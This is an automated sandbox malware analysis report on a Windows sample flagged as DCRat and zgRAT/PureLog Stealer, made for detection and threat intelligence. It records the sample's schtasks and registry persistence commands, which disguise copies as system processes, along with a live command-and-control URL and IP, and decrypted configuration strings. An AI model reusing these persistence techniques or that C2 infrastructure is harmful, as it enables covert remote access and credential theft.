Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
r6cRyCpdfS.exe

Overview

General Information

Sample name:r6cRyCpdfS.exe
renamed because original name is a hash value
Original sample name:6310493F1EAE60F8F1375EB05341A7D7.exe
Analysis ID:1581086
MD5:6310493f1eae60f8f1375eb05341a7d7
SHA1:8b0d6e459d66346e8dba5a0d857b4b192871d437
SHA256:08e4f00e67200c00552466fc1179a23d17f4c7497afe89c4d5d4b6d8878216f4
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • r6cRyCpdfS.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\r6cRyCpdfS.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
    • schtasks.exe (PID: 7420 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7444 cmdline: schtasks.exe /create /tn "smartscreen" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7468 cmdline: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 7484 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7540 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FF9.tmp" "c:\Windows\System32\CSC4943203AAE5A4E8090303227122B2EDA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 7564 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Recovery\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7588 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7612 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 7 /tr "'C:\Recovery\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7636 cmdline: schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7664 cmdline: schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWr" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7688 cmdline: schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7712 cmdline: schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7736 cmdline: schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWr" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7760 cmdline: schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7784 cmdline: schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7808 cmdline: schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWr" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7832 cmdline: schtasks.exe /create /tn "rCdgcwByUDmMcQzYkDZywyWrr" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7856 cmdline: schtasks.exe /create /tn "r6cRyCpdfSr" /sc MINUTE /mo 7 /tr "'C:\Users\user\Desktop\r6cRyCpdfS.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7880 cmdline: schtasks.exe /create /tn "r6cRyCpdfS" /sc ONLOGON /tr "'C:\Users\user\Desktop\r6cRyCpdfS.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7904 cmdline: schtasks.exe /create /tn "r6cRyCpdfSr" /sc MINUTE /mo 5 /tr "'C:\Users\user\Desktop\r6cRyCpdfS.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7932 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aD6W5T5CI2.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7996 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 8048 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • rCdgcwByUDmMcQzYkDZywyWr.exe (PID: 2188 cmdline: "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • r6cRyCpdfS.exe (PID: 7940 cmdline: C:\Users\user\Desktop\r6cRyCpdfS.exe MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • r6cRyCpdfS.exe (PID: 7988 cmdline: C:\Users\user\Desktop\r6cRyCpdfS.exe MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • rCdgcwByUDmMcQzYkDZywyWr.exe (PID: 8020 cmdline: "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • rCdgcwByUDmMcQzYkDZywyWr.exe (PID: 8040 cmdline: "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • smartscreen.exe (PID: 8076 cmdline: "C:\Program Files (x86)\jdownloader\smartscreen.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • smartscreen.exe (PID: 8084 cmdline: "C:\Program Files (x86)\jdownloader\smartscreen.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • WmiPrvSE.exe (PID: 8100 cmdline: C:\Recovery\WmiPrvSE.exe MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • WmiPrvSE.exe (PID: 8108 cmdline: C:\Recovery\WmiPrvSE.exe MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • smartscreen.exe (PID: 7376 cmdline: "C:\Program Files (x86)\jdownloader\smartscreen.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • WmiPrvSE.exe (PID: 8008 cmdline: "C:\Recovery\WmiPrvSE.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • rCdgcwByUDmMcQzYkDZywyWr.exe (PID: 7684 cmdline: "C:\Program Files (x86)\microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • r6cRyCpdfS.exe (PID: 5000 cmdline: "C:\Users\user\Desktop\r6cRyCpdfS.exe" MD5: 6310493F1EAE60F8F1375EB05341A7D7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://321723cm.renyash.ru/AuthdbBasetraffic", "MUTEX": "DCR_MUTEX-z29Ai5otByR2YyFUw1eS", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
r6cRyCpdfS.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    r6cRyCpdfS.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\jDownloader\smartscreen.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\jDownloader\smartscreen.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1658435835.0000000000332000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000022.00000002.2932291233.000000000392E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000022.00000002.2932291233.0000000003C03000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000000.00000002.1753825476.00000000129B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 3 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.r6cRyCpdfS.exe.330000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.r6cRyCpdfS.exe.330000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\r6cRyCpdfS.exe, ProcessId: 7268, TargetFilename: C:\Recovery\WmiPrvSE.exe
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\jdownloader\smartscreen.exe", CommandLine: "C:\Program Files (x86)\jdownloader\smartscreen.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\jDownloader\smartscreen.exe, NewProcessName: C:\Program Files (x86)\jDownloader\smartscreen.exe, OriginalFileName: C:\Program Files (x86)\jDownloader\smartscreen.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\jdownloader\smartscreen.exe", ProcessId: 8076, ProcessName: smartscreen.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\jdownloader\smartscreen.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\r6cRyCpdfS.exe, ProcessId: 7268, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smartscreen
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\jdownloader\smartscreen.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\r6cRyCpdfS.exe, ProcessId: 7268, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\r6cRyCpdfS.exe", ParentImage: C:\Users\user\Desktop\r6cRyCpdfS.exe, ParentProcessId: 7268, ParentProcessName: r6cRyCpdfS.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline", ProcessId: 7484, ProcessName: csc.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\r6cRyCpdfS.exe, ProcessId: 7268, TargetFilename: C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\r6cRyCpdfS.exe", ParentImage: C:\Users\user\Desktop\r6cRyCpdfS.exe, ParentProcessId: 7268, ParentProcessName: r6cRyCpdfS.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aqgoggve\aqgoggve.cmdline", ProcessId: 7484, ProcessName: csc.exe

                              Persistence and Installation Behavior

                              barindex
                              Sigma detected: Schedule system process
                              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /f, CommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\r6cRyCpdfS.exe", ParentImage: C:\Users\user\Desktop\r6cRyCpdfS.exe, ParentProcessId: 7268, ParentProcessName: r6cRyCpdfS.exe, ProcessCommandLine: schtasks.exe /create /tn "smartscreens" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\jdownloader\smartscreen.exe'" /f, ProcessId: 7420, ProcessName: schtasks.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-26T22:32:17.680237+010020480951A Network Trojan was detected192.168.2.44973137.44.238.25080TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: r6cRyCpdfS.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://321723cm.renyash.ruAvira URL Cloud: Label: malware
                              Source: http://321723cm.renyash.ru/Avira URL Cloud: Label: malware
                              Source: http://321723cm.renyash.ru/AuthdbBasetraffic.phpAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\DGaPaFaK.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\ROdEDIli.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                              Source: C:\Recovery\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\GzqyMBLI.logAvira: detection malicious, Label: TR/Agent.jbwuj
                              Source: C:\Users\user\Desktop\PLrVhZhn.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\AaEpKsEu.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Users\user\Desktop\SChMoWhg.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Users\user\Desktop\JVTxIHOe.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                              Source: C:\Users\user\AppData\Local\Temp\aD6W5T5CI2.batAvira: detection malicious, Label: BAT/Delbat.C
                              Found malware configuration
                              Source: 00000000.00000002.1753825476.00000000129B1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://321723cm.renyash.ru/AuthdbBasetraffic", "MUTEX": "DCR_MUTEX-z29Ai5otByR2YyFUw1eS", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeReversingLabs: Detection: 73%
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeReversingLabs: Detection: 73%
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeReversingLabs: Detection: 73%
                              Source: C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exeReversingLabs: Detection: 73%
                              Source: C:\Recovery\WmiPrvSE.exeReversingLabs: Detection: 73%
                              Source: C:\Users\user\Desktop\AaEpKsEu.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\CdKPGOIP.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\FlHYcgCL.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\GzqyMBLI.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\LGyNPUZX.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\LVAfadhu.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\PLrVhZhn.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\SChMoWhg.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\TJxnsSJM.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\WudDzgUF.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\XOqvKXRc.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\XTzlBYHG.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\akTuGdUy.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\cVzKNqfr.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\ceWKxdyo.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\dQqVXqpO.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\haYbFIoh.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\jaFJWeGx.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\mESaxTkZ.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\vCoIsDxd.logReversingLabs: Detection: 70%
                              Multi AV Scanner detection for submitted file
                              Source: r6cRyCpdfS.exeReversingLabs: Detection: 73%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Program Files (x86)\jDownloader\smartscreen.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\DGaPaFaK.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\ROdEDIli.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\ScMeneug.logJoe Sandbox ML: detected
                              Source: C:\Recovery\WmiPrvSE.exeJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\PLrVhZhn.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\JVTxIHOe.logJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: r6cRyCpdfS.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 00000000.00000002.1753825476.00000000129B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-z29Ai5otByR2YyFUw1eS","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                              Source: 00000000.00000002.1753825476.00000000129B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://321723cm.renyash.ru/","AuthdbBasetraffic"]]
                              Source: r6cRyCpdfS.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDirectory created: C:\Program Files\Windows Mail\rCdgcwByUDmMcQzYkDZywyWr.exeJump to behavior
                              Source: C:\Users\user\Desktop\r6cRyCpdfS.exeDirectory created: C:\Program Files\Windows Mail\6562cf32ce99caJump to behavior
